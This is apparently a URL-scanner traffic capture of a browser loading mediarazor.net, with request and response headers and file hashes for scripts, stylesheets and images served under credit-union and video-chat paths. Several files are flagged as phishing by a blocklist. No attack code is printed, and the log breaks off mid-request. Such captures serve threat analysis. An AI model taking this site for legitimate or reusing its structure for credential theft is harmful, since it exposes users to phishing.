User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://mediarazor.net/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         104.17.25.14
HTTP/2 200 OK
content-type: application/javascript; charset=utf-8
                                        
date: Mon, 26 Sep 2022 14:11:23 GMT
content-length: 4517
access-control-allow-origin: *
cache-control: public, max-age=30672000
content-encoding: br
etag: "5eb03ec3-4e98"
last-modified: Mon, 04 May 2020 16:11:47 GMT
cf-cdnjs-via: cfworker/kv
cross-origin-resource-policy: cross-origin
timing-allow-origin: *
x-content-type-options: nosniff
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
vary: Accept-Encoding
cf-cache-status: HIT
age: 2916669
expires: Sat, 16 Sep 2023 14:11:23 GMT
accept-ranges: bytes
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=spPGTGqwQw9P7aH5VlfkGn9y7a4nKXAEVGIqz%2FuyEvbHdbRRHLK61MEBN7fY6Gq3qV9JZP4o4bvHWFPo2tMbI%2B4CU%2Fh7nFfYUxZmcSXOhrgyJDfra%2FVR8o5sFlTjt1wDRKvZvTOK"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
strict-transport-security: max-age=15780000
server: cloudflare
cf-ray: 750c96a9e8a9fac0-OSL
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text
Size:   4517
Md5:    e40e054c5726f042bad463e3774a2777
Sha1:   5c9413b72837a440b327444104830c35ae3b052c
Sha256: fcc8a86d2e89e8fbe9815d50c23bf205191ab8a6c0bec67358cd975d94283ff8
                                        
                                            GET /jquery-3.3.1.slim.min.js HTTP/1.1 
Host: code.jquery.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: http://mediarazor.net
Connection: keep-alive
Referer: http://mediarazor.net/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         69.16.175.10
HTTP/2 200 OK
content-type: application/javascript; charset=utf-8
                                        
date: Mon, 26 Sep 2022 14:11:23 GMT
content-encoding: gzip
content-length: 24038
last-modified: Fri, 20 Aug 2021 17:47:53 GMT
accept-ranges: bytes
server: nginx
etag: W/"611feac9-1111d"
cache-control: max-age=315360000, public
access-control-allow-origin: *
vary: Accept-Encoding
x-hw: 1664201483.dop215.sk1.t,1664201483.cds202.sk1.hn,1664201483.cds230.sk1.c
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (65247)
Size:   24038
Md5:    0f2e7d37e730fdbb1d8a1e8638529ecb
Sha1:   c21d16978a858baa75be15cb7e799ff000929429
Sha256: cc938c08b93e67c94c68995709f52133c62cac78991f42058503b9c3d9e4b0b0
                                        
                                            GET /jquery-3.2.1.min.js HTTP/1.1 
Host: code.jquery.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://mediarazor.net/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         69.16.175.10
HTTP/2 200 OK
content-type: application/javascript; charset=utf-8
                                        
date: Mon, 26 Sep 2022 14:11:23 GMT
content-encoding: gzip
content-length: 30125
last-modified: Fri, 20 Aug 2021 17:47:53 GMT
accept-ranges: bytes
server: nginx
etag: W/"611feac9-15283"
cache-control: max-age=315360000, public
access-control-allow-origin: *
vary: Accept-Encoding
x-hw: 1664201483.dop232.sk1.t,1664201483.cds260.sk1.hn,1664201483.cds222.sk1.c
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (32058)
Size:   30125
Md5:    148f8d3ffd9cc02048c5f4d1cc83c407
Sha1:   9f2b89cfd151be6a29b4d43ad64d164fb8471046
Sha256: 4dc681da48ba2b417e613e8e027ff5322963c3a3697a8ba97973cfefb48def5e
                                        
                                            GET /ajax/jQuery/jquery-3.3.1.min.js HTTP/1.1 
Host: ajax.aspnetcdn.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://mediarazor.net/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         152.199.19.160
HTTP/2 200 OK
content-type: application/javascript
                                        
content-encoding: gzip
accept-ranges: bytes
access-control-allow-origin: *
age: 17202978
cache-control: public,max-age=31536000
date: Mon, 26 Sep 2022 14:11:23 GMT
etag: "80288516b793d31:0"
last-modified: Mon, 22 Jan 2018 19:27:49 GMT
server: ECAcc (ska/F7A8)
timing-allow-origin: *
vary: Accept-Encoding
x-cache: HIT
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
content-length: 30394
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (65451)
Size:   30394
Md5:    a263be51483c81a54aa8c85104a93e55
Sha1:   555a54a73531c553bd2aede6abc25c128b63312e
Sha256: b2f13ad730928958c09d89e6e32bb6a227c0260d032a39ca464d998a59e57a66
                                        
                                            GET /BecomeMember/CreditUnion/BecomeAMember/EnjoyConvinience/font-icons.css HTTP/1.1 
Host: mediarazor.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://mediarazor.net/?e=/

                                         
                                         192.185.141.13
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Mon, 26 Sep 2022 14:11:23 GMT
Server: Apache
Upgrade: h2,h2c
Connection: Upgrade, Keep-Alive
Last-Modified: Mon, 25 Jul 2022 08:40:22 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 8185
Keep-Alive: timeout=5, max=75


--- Additional Info ---
Magic:  ASCII text, with CRLF line terminators
Size:   8185
Md5:    057e9f3561242476d1587f75b0a8ba0b
Sha1:   d50935d746c3fa3961bad8e1dc6f64e8cd11ddb9
Sha256: 9a52d9fb48445c1f63baad46f4f103946f040ba23cf91cb191443458eb5b085d
                                        
                                            POST / HTTP/1.1 
Host: ocsp.digicert.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Accept-Ranges: bytes
Age: 5505
Cache-Control: 'max-age=158059'
Date: Mon, 26 Sep 2022 14:11:23 GMT
Last-Modified: Mon, 26 Sep 2022 12:39:38 GMT
Server: ECS (ska/F715)
X-Cache: HIT
Content-Length: 279

                                        
                                            GET /v1/buckets/main/collections/ms-language-packs/records/cfr-v1-en-US HTTP/1.1 
Host: firefox.settings.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         143.204.55.35
HTTP/1.1 200 OK
Content-Type: application/json
                                        
Content-Length: 329
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: ETag, Expires, Content-Length, Cache-Control, Pragma, Content-Type, Alert, Backoff, Last-Modified, Retry-After
Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
Last-Modified: Fri, 25 Mar 2022 17:45:46 GMT
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
Cache-Control: max-age=3600, max-age=3600
Date: Mon, 26 Sep 2022 14:10:46 GMT
Expires: Mon, 26 Sep 2022 14:30:37 GMT
ETag: "1648230346554"
X-Cache: Hit from cloudfront
Via: 1.1 a2b4f68a89fc87406bff22c95fc07fba.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: OSL50-C1
X-Amz-Cf-Id: Zq1FAsc4nWykmIrIkTw5RnMoUf0rRSg6UhFksk4ejcUOxaEzp6uZwg==
Age: 37


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with very long lines (329), with no line terminators
Size:   329
Md5:    0333b0655111aa68de771adfcc4db243
Sha1:   63f295a144ac87a7c8e23417626724eeca68a7eb
Sha256: 60636eb1dc67c9ed000fe0b49f03777ad6f549cb1d2b9ff010cf198465ae6300
                                        
                                            GET /BecomeMember/CreditUnion/BecomeAMember/EnjoyConvinience/jquery-ui.min.css HTTP/1.1 
Host: mediarazor.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://mediarazor.net/?e=/

                                         
                                         192.185.141.13
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Mon, 26 Sep 2022 14:11:23 GMT
Server: Apache
Upgrade: h2,h2c
Connection: Upgrade, Keep-Alive
Last-Modified: Mon, 25 Jul 2022 08:40:20 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 6875
Keep-Alive: timeout=5, max=75


--- Additional Info ---
Magic:  ASCII text, with very long lines (26573)
Size:   6875
Md5:    65f17e07fc9ed394791d42718a985a17
Sha1:   3397fd1d56c6ba1585986252fdcccf6661477aec
Sha256: 0456efb27550d636eadad0556a7147a453947b226704a32c9ffb7842416ed9f2
                                        
                                            GET /BecomeMember/CreditUnion/BecomeAMember/EnjoyConvinience/iris-components.shim.mobile.min.css HTTP/1.1 
Host: mediarazor.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://mediarazor.net/?e=/

                                         
                                         192.185.141.13
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Mon, 26 Sep 2022 14:11:23 GMT
Server: Apache
Last-Modified: Mon, 25 Jul 2022 08:40:18 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 494
Keep-Alive: timeout=5, max=73
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII text, with very long lines (687)
Size:   494
Md5:    28bfa06c6a390a973902cc8bb11b20d6
Sha1:   5020355d68009f138934eb4a93519f4d5d36d51d
Sha256: c499e2b9c76be6c09b51e24cf76a69f7f59675df0d2798b0a7f4f7dab5245efc
                                        
                                            GET /BecomeMember/CreditUnion/BecomeAMember/EnjoyConvinience/iris-foundation.min-1.css HTTP/1.1 
Host: mediarazor.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://mediarazor.net/?e=/

                                         
                                         192.185.141.13
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Mon, 26 Sep 2022 14:11:23 GMT
Server: Apache
Last-Modified: Mon, 25 Jul 2022 08:40:22 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 8516
Keep-Alive: timeout=5, max=74
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII text, with very long lines (50964)
Size:   8516
Md5:    264be610a4f23ef103e6e511c9e95123
Sha1:   044e66d5435ae91f3a0c31f7cec6ead7e0cbbb75
Sha256: 800fd724bcdf97640fb99005046de6106d4933a80b402573b23d23eb130e5f95
                                        
                                            GET /BecomeMember/CreditUnion/BecomeAMember/EnjoyConvinience/iris-foundation.min.css HTTP/1.1 
Host: mediarazor.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://mediarazor.net/?e=/

                                         
                                         192.185.141.13
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Mon, 26 Sep 2022 14:11:23 GMT
Server: Apache
Upgrade: h2,h2c
Connection: Upgrade, Keep-Alive
Last-Modified: Mon, 25 Jul 2022 08:40:18 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 8519
Keep-Alive: timeout=5, max=75


--- Additional Info ---
Magic:  ASCII text, with very long lines (50964)
Size:   8519
Md5:    bfd648c0d0266e1af11e80cfa6ea36c2
Sha1:   184d070bdcf329aaab17c0847c6a7000ebd67c8f
Sha256: b3f78dc073ffd25db390f67183f4b130595df5ff0b5d8b033325aac7bacc44a0
                                        
                                            POST / HTTP/1.1 
Host: ocsp.digicert.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Accept-Ranges: bytes
Age: 5506
Cache-Control: 'max-age=158059'
Date: Mon, 26 Sep 2022 14:11:24 GMT
Last-Modified: Mon, 26 Sep 2022 12:39:38 GMT
Server: ECS (ska/F715)
X-Cache: HIT
Content-Length: 279

                                        
                                            GET /BecomeMember/CreditUnion/BecomeAMember/EnjoyConvinience/base.min.css HTTP/1.1 
Host: mediarazor.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://mediarazor.net/?e=/

                                         
                                         192.185.141.13
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Mon, 26 Sep 2022 14:11:23 GMT
Server: Apache
Upgrade: h2,h2c
Connection: Upgrade, Keep-Alive
Last-Modified: Mon, 25 Jul 2022 08:40:18 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 707
Keep-Alive: timeout=5, max=75


--- Additional Info ---
Magic:  ASCII text, with very long lines (1875)
Size:   707
Md5:    a7a6db9d88db1adb9b44bcdd734882a3
Sha1:   d3a8c5f15b40d1965a8fa03f7771a893ebf06c46
Sha256: 69cba3e79e49ace70d0dc5adb432453424da9d866665b622fc6a72b26f245f8c
                                        
                                            POST / HTTP/1.1 
Host: ocsp.digicert.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Accept-Ranges: bytes
Age: 6156
Cache-Control: 'max-age=158059'
Date: Mon, 26 Sep 2022 14:11:24 GMT
Last-Modified: Mon, 26 Sep 2022 12:28:48 GMT
Server: ECS (ska/F715)
X-Cache: HIT
Content-Length: 471

                                        
                                            GET /BecomeMember/CreditUnion/BecomeAMember/EnjoyConvinience/isotope.min.css HTTP/1.1 
Host: mediarazor.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://mediarazor.net/?e=/

                                         
                                         192.185.141.13
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Mon, 26 Sep 2022 14:11:24 GMT
Server: Apache
Last-Modified: Mon, 25 Jul 2022 08:40:16 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 3677
Keep-Alive: timeout=5, max=72
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII text, with very long lines (5628)
Size:   3677
Md5:    143661b928ffbe64bc0e4f48baa3ff72
Sha1:   5e9a681f3eb136a9b4d90061a356e95075a691b5
Sha256: c4c0b9533da97c7949b9609ad836ad2f4ce83d029fd62927d387a28fdcc859ba
                                        
                                            GET /BecomeMember/CreditUnion/BecomeAMember/EnjoyConvinience/theme.mobile.min.css HTTP/1.1 
Host: mediarazor.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://mediarazor.net/?e=/

                                         
                                         192.185.141.13
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Mon, 26 Sep 2022 14:11:23 GMT
Server: Apache
Upgrade: h2,h2c
Connection: Upgrade, Keep-Alive
Last-Modified: Mon, 25 Jul 2022 08:40:20 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Keep-Alive: timeout=5, max=75
Transfer-Encoding: chunked


--- Additional Info ---
Magic:  ASCII text, with very long lines (65536), with no line terminators
Size:   29904
Md5:    950eca5961010385ad8ae46a900473b1
Sha1:   16b9ccb0291596484c366b46c8d0a5e06b84460b
Sha256: ebc036dabddd05cc3d38428f45109c83b94c725f502cbf8488c459edd50a202f
                                        
                                            GET /VideoChat/Face_to_Face/ServiceAgent/MobileDevice/style.css HTTP/1.1 
Host: mediarazor.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://mediarazor.net/?e=/

                                         
                                         192.185.141.13
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Mon, 26 Sep 2022 14:11:24 GMT
Server: Apache
Last-Modified: Wed, 17 Nov 2021 03:01:14 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 219
Keep-Alive: timeout=5, max=74
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII text, with CRLF line terminators
Size:   219
Md5:    7240cd696e83764a97dce3dfd188ddf3
Sha1:   f7c916322f2bc305163bccf9f7664c9ce55eae1b
Sha256: 481b1416b7b3e0e6a47254c071096cdf146275781a53151b4f86f606ea4164a9
                                        
                                            GET /VideoChat/Face_to_Face/ServiceAgent/MobileDevice/actions.js HTTP/1.1 
Host: mediarazor.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://mediarazor.net/?e=/

                                         
                                         192.185.141.13
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Mon, 26 Sep 2022 14:11:24 GMT
Server: Apache
Last-Modified: Wed, 17 Nov 2021 02:48:10 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 507
Keep-Alive: timeout=5, max=74
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII text, with CRLF line terminators
Size:   507
Md5:    455081f731bfbd9139180d31894310cc
Sha1:   9b21091ce1d79ebb29a27189bff7676ba0e0a724
Sha256: 4d117e57953cf5da2fcec83691834497792d2df0a9ae0bd21f210dc563d8d6b6

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /BecomeMember/CreditUnion/BecomeAMember/EnjoyConvinience/iris-components.min.css HTTP/1.1 
Host: mediarazor.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://mediarazor.net/?e=/

                                         
                                         192.185.141.13
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Mon, 26 Sep 2022 14:11:24 GMT
Server: Apache
Last-Modified: Mon, 25 Jul 2022 08:40:22 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Keep-Alive: timeout=5, max=74
Connection: Keep-Alive
Transfer-Encoding: chunked


--- Additional Info ---
Magic:  ASCII text, with very long lines (65309)
Size:   36400
Md5:    2c9e3f93555d3eea50bd4077ab26d3df
Sha1:   4aa3fd66a190b57012ed9010b9d5808c3284a76b
Sha256: c4ac04865ed49f7e607791bb63ea519178350f8174babf59ff663503cca570fd
                                        
                                            GET /BecomeMember/CreditUnion/BecomeAMember/EnjoyConvinience/iris.shim.mobile.min.css HTTP/1.1 
Host: mediarazor.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://mediarazor.net/?e=/

                                         
                                         192.185.141.13
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Mon, 26 Sep 2022 14:11:24 GMT
Server: Apache
Last-Modified: Mon, 25 Jul 2022 08:40:20 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 295
Keep-Alive: timeout=5, max=71
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII text, with very long lines (557)
Size:   295
Md5:    9f7f099786e6d33fca0425406516467f
Sha1:   a9e12ef8c450ee96c6429d0189ec1645d3fa3073
Sha256: 16c09e22c4052d26724b6ce6e998344e03d77b0ef8c98d11c18b3923a11721f3
                                        
                                            GET /BecomeMember/CreditUnion/BecomeAMember/EnjoyConvinience/iris.android.min.css HTTP/1.1 
Host: mediarazor.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://mediarazor.net/?e=/

                                         
                                         192.185.141.13
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Mon, 26 Sep 2022 14:11:24 GMT
Server: Apache
Last-Modified: Mon, 25 Jul 2022 08:40:20 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Keep-Alive: timeout=5, max=74
Connection: Keep-Alive
Transfer-Encoding: chunked


--- Additional Info ---
Magic:  ASCII text, with very long lines (65536), with no line terminators
Size:   21878
Md5:    5f1cf7274f413cbcc26b5417b6945d30
Sha1:   9c5e29ef6fb92080bd6ddb8a880e0771aba16926
Sha256: 5318c2c924c510772751c7d9aaeb80d0ff3cea1431ae7466137fa27fa499f892
                                        
                                            GET / HTTP/1.1 
Host: push.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Sec-WebSocket-Version: 13
Origin: wss://push.services.mozilla.com/
Sec-WebSocket-Protocol: push-notification
Sec-WebSocket-Extensions: permessage-deflate
Sec-WebSocket-Key: /4VYZIuN9rOKihOvONGdIA==
Connection: keep-alive, Upgrade
Sec-Fetch-Dest: websocket
Sec-Fetch-Mode: websocket
Sec-Fetch-Site: cross-site
Pragma: no-cache
Cache-Control: no-cache
Upgrade: websocket

                                         
                                         54.149.28.179
HTTP/1.1 101 Switching Protocols
                                        
Connection: Upgrade
Upgrade: websocket
Sec-WebSocket-Accept: IjEIZedhr3YayNAWTF/+2nVUn7I=

                                        
                                            GET /BecomeMember/CreditUnion/BecomeAMember/EnjoyConvinience/app-store-badge.svg HTTP/1.1 
Host: mediarazor.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://mediarazor.net/?e=/

                                         
                                         192.185.141.13
HTTP/1.1 200 OK
Content-Type: image/svg+xml
                                        
Date: Mon, 26 Sep 2022 14:11:24 GMT
Server: Apache
Last-Modified: Mon, 25 Jul 2022 08:40:18 GMT
Accept-Ranges: bytes
Content-Length: 10850
Keep-Alive: timeout=5, max=73
Connection: Keep-Alive


--- Additional Info ---
Magic:  SVG Scalable Vector Graphics image\012- HTML document, ASCII text, with very long lines (1356), with CRLF line terminators
Size:   10850
Md5:    1b65926236d951b2af57201b275f595b
Sha1:   1ce3e7bf2853a59f0fc9ad064e1fd48260da0f38
Sha256: 86c9954e1457d27db013c1f10a96ffaba845e5af7765c4ef9df4ac1549e47d67

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /BecomeMember/CreditUnion/BecomeAMember/EnjoyConvinience/google-play-badge.svg HTTP/1.1 
Host: mediarazor.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://mediarazor.net/?e=/

                                         
                                         192.185.141.13
HTTP/1.1 200 OK
Content-Type: image/svg+xml
                                        
Date: Mon, 26 Sep 2022 14:11:24 GMT
Server: Apache
Last-Modified: Mon, 25 Jul 2022 08:40:18 GMT
Accept-Ranges: bytes
Content-Length: 9332
Keep-Alive: timeout=5, max=73
Connection: Keep-Alive


--- Additional Info ---
Magic:  SVG Scalable Vector Graphics image\012- SVG XML document\012- XML 1.0 document text\012- SVG XML document\012- XML document text\012- HTML document text\012- exported SGML document text\012- exported SGML document, ASCII text, with CRLF line terminators
Size:   9332
Md5:    5e01637f08de80e8c27c414687738968
Sha1:   2d4fe2500bb550dc45c048e78aa62356fb4cbc2c
Sha256: 2dcf765854f1fe869b1674016feb1638870c1066f156f8d7dfd47b53d0dc093f

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /BecomeMember/CreditUnion/BecomeAMember/EnjoyConvinience/1ca8ebd0.js HTTP/1.1 
Host: mediarazor.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://mediarazor.net/?e=/

                                         
                                         192.185.141.13
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Mon, 26 Sep 2022 14:11:24 GMT
Server: Apache
Last-Modified: Mon, 25 Jul 2022 08:40:26 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Keep-Alive: timeout=5, max=73
Connection: Keep-Alive
Transfer-Encoding: chunked


--- Additional Info ---
Magic:  ASCII text, with very long lines (60538), with CRLF, LF line terminators
Size:   211581
Md5:    dfcf834a04d382a2406dbf87ec71bc3b
Sha1:   2332075927a75c7721eb079ef9e0180b63c3b544
Sha256: 959dbe20af68111f10b9394fab0a3f2d9a5ca0143dac8c6606e603d90ef9bf53

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /VideoChat/Face_to_Face/ServiceAgent/MobileDevice/loading.gif HTTP/1.1 
Host: mediarazor.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://mediarazor.net/?e=/

                                         
                                         192.185.141.13
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Date: Mon, 26 Sep 2022 14:11:24 GMT
Server: Apache
Last-Modified: Sun, 12 Aug 2018 01:03:52 GMT
Accept-Ranges: bytes
Content-Length: 38636
Keep-Alive: timeout=5, max=73
Connection: Keep-Alive


--- Additional Info ---
Magic:  GIF image data, version 89a, 200 x 200\012- data
Size:   38636
Md5:    d10ef01e81faa2c2d812bdf670b4e072
Sha1:   77d09a57b2091fd7665dff763a5eab23e0ff907e
Sha256: 5e3d5246b17e19e65385092db07554d8e1c5c4a226a6d7f97824b8e1e8571e34
                                        
                                            GET /BecomeMember/CreditUnion/BecomeAMember/EnjoyConvinience/MobileLogo.png HTTP/1.1 
Host: mediarazor.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
